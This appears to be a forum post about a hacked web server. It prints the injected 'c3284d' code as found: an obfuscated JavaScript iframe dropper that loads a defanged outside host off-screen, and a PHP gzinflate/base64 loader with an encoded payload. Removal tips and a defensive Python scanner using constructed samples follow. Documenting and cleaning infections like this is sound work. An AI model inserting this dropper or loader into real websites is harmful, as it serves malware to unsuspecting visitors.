JS:Iframe-FG [Trj] Trojan and code injection on web servers

Hi,

Today one of my friends turned to me with a problem on her web server, which, running PHP, gave a T_STRING error.
At first I thought it was a coding error, but as it occurs quite often and not through my friend doing something, it seemed as if it were a malicious code insertion / hacking attempt.
When trying to look into that problem (scanning other files via the web), Avast WebShield blocked that site/page, giving out a “JS:Iframe-FG [Trj]” trojan notice (it was an HTML file in question).
Looking into the file, there was this code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta http-equiv="refresh" content="0; url=hXXp://www.haagissuvilad.ee"><title>Redirect</title></head><body><!--c3284d--><script>
var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'hXXp://heartofpole.net/xml.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);
</script><!--/c3284d-->

<div align="center">Kui teie lehitseja ei toeta suunamist siis vajutage <a href="hXXp://www.haagissuvilad.ee">siia</a> to be redirected</div></body></html>

As I was the one who, ages ago, had created that HTML file, I did not remember adding any code with “c3284d” to it.
It turns out that this particular code insertion is widely known and has been put on many other websites.
More info at: stopmalvertising.com - the-c3284d-malware-network-stats
When investigating the T_STRING error I also found code inserted in the index.php file:

#c3284d#
echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw==")));
#/c3284d#

So, as you see, the problem/threat is real.

NB! To get rid of that malicious code, or of Avast reporting your site as “infected with JS:Iframe-FG [Trj]”, just scan your server root and look for the aforementioned tag “c3284d” in your code. When you remove everything between and including those tags, the problem is solved: no more malicious reports, and the website works again! Or you can just overwrite the infected file with an old copy, if you happen to have one!

NB! I have since found new code in other .htaccess files with the tag “b58b6f”, so in principle watch out for any suspicious code with such tags!
(If you happen to use Dreamweaver, for me it pointed out the places in the code with those tags, because the original code had been broken by the insertion.)

Hope that this post helps you out there!

Cheers,
Kristjan T.
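
A scanner for this kind of tagged injection, added here as an example (it is not code from the post above). It walks a web root, reports every file carrying a `<!--tag-->…<!--/tag-->` or `#tag#…#/tag#` block with a six-hex-digit tag like c3284d or b58b6f, optionally strips those blocks in place, and decodes any `gzinflate(base64_decode("…"))` loader it finds so the payload can be read before deleting it. The .htaccess marker format is not shown in the post, so the assumption here is that it uses the same `#tag#` pair; the sample files, the payload and the `example.invalid` URL are constructed stand-ins, not the real malware.

```python
"""Find and strip marker-tagged code injections (the c3284d / b58b6f kind)
across a web root and decode gzinflate(base64_decode()) PHP loaders.
Added example; not code from the original post."""
import base64
import re
import tempfile
import zlib
from pathlib import Path

# Marker forms seen in the post: '<!--tag-->...<!--/tag-->' around the JS
# iframe dropper in HTML and '#tag#...#/tag#' around the PHP loader.
# The .htaccess form (tag b58b6f) is not shown; assumed to be the '#tag#' pair.
TAG = r'[0-9a-f]{6}'
MARKED_BLOCK = re.compile(
    r'<!--(?P<t1>' + TAG + r')-->.*?<!--/(?P=t1)-->'
    r'|#(?P<t2>' + TAG + r')#.*?#/(?P=t2)#',
    re.DOTALL,
)
# The PHP loader seen in the post: echo(gzinflate(base64_decode("<blob>")))
GZ_B64 = re.compile(
    r'gzinflate\(\s*base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)')
SCAN_SUFFIXES = {'.php', '.html', '.htm', '.js'}
SCAN_NAMES = {'.htaccess'}


def find_injections(text):
    """Return (tag, block) for every marker-delimited block in text."""
    return [(m.group('t1') or m.group('t2'), m.group(0))
            for m in MARKED_BLOCK.finditer(text)]


def strip_injections(text):
    """Remove every marker-delimited block; return (cleaned_text, count)."""
    return MARKED_BLOCK.subn('', text)


def decode_gzinflate_b64(blob):
    """PHP gzinflate() is raw DEFLATE without a zlib header: wbits=-15."""
    return zlib.decompress(base64.b64decode(blob), -15).decode('latin-1')


def extract_payloads(text):
    """Decode each gzinflate(base64_decode("...")) blob found in text."""
    return [decode_gzinflate_b64(b) for b in GZ_B64.findall(text)]


def scan_tree(root, fix=False):
    """Walk root and return {relative_path: [tags]} for files with marker
    blocks.  fix=True removes the blocks in place.  Files are decoded as
    latin-1 so every byte round-trips unchanged, whatever the real charset."""
    root = Path(root)
    report = {}
    for path in root.rglob('*'):
        if not path.is_file():
            continue
        if path.suffix not in SCAN_SUFFIXES and path.name not in SCAN_NAMES:
            continue
        text = path.read_bytes().decode('latin-1')
        hits = find_injections(text)
        if not hits:
            continue
        report[str(path.relative_to(root))] = [tag for tag, _ in hits]
        if fix:
            cleaned, _ = strip_injections(text)
            path.write_bytes(cleaned.encode('latin-1'))
    return report


def make_gzinflate_blob(php_source):
    """Build a base64(raw-deflate) blob of the form the loader expects,
    so the decoder can be exercised on constructed data."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = c.compress(php_source.encode('latin-1')) + c.flush()
    return base64.b64encode(raw).decode('ascii')


# Constructed samples modelled on the post's snippets (not the real payload).
SAMPLE_PAYLOAD = '<?php /* constructed stand-in for the real payload */ echo "x"; ?>'
SAMPLE_HTML = (
    '<html><body><!--c3284d--><script>var _q=document.createElement("iframe");'
    '_q.setAttribute("src","http://example.invalid/xml.php");</script><!--/c3284d-->'
    '<div>legit content</div></body></html>'
)
SAMPLE_PHP = ('<?php\n#c3284d#\necho(gzinflate(base64_decode("'
              + make_gzinflate_blob(SAMPLE_PAYLOAD)
              + '")));\n#/c3284d#\necho "site";\n')


def demo():
    """Write the samples into a temp web root, decode, clean, and report."""
    with tempfile.TemporaryDirectory() as root:
        r = Path(root)
        (r / 'index.php').write_bytes(SAMPLE_PHP.encode('latin-1'))
        (r / 'page.html').write_bytes(SAMPLE_HTML.encode('latin-1'))
        (r / 'style.css').write_bytes(b'body{}')  # not scanned
        payloads = extract_payloads((r / 'index.php').read_bytes().decode('latin-1'))
        found = scan_tree(root, fix=True)
        after = scan_tree(root)
        idx = (r / 'index.php').read_bytes().decode('latin-1')
        page = (r / 'page.html').read_bytes().decode('latin-1')
    return {
        'found': found,
        'payloads': payloads,
        'clean_after_fix': after == {},
        'legit_kept': 'echo "site";' in idx and 'legit content' in page,
        'dropper_gone': 'iframe' not in page and 'gzinflate' not in idx,
    }


if __name__ == '__main__':
    for k, v in demo().items():
        print(k, '->', v)
```

Run `scan_tree('/var/www/html')` first without `fix=True` and review the report and the decoded payloads; only then rerun with `fix=True`, after taking a backup. The markers make these injections easy to strip, but a clean result from this scanner says nothing about how the attacker got write access in the first place, so rotate FTP/hosting credentials and patch the application as well.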

Thanks for the heads up! :slight_smile:

This is a known method to redirect the browser based on all means.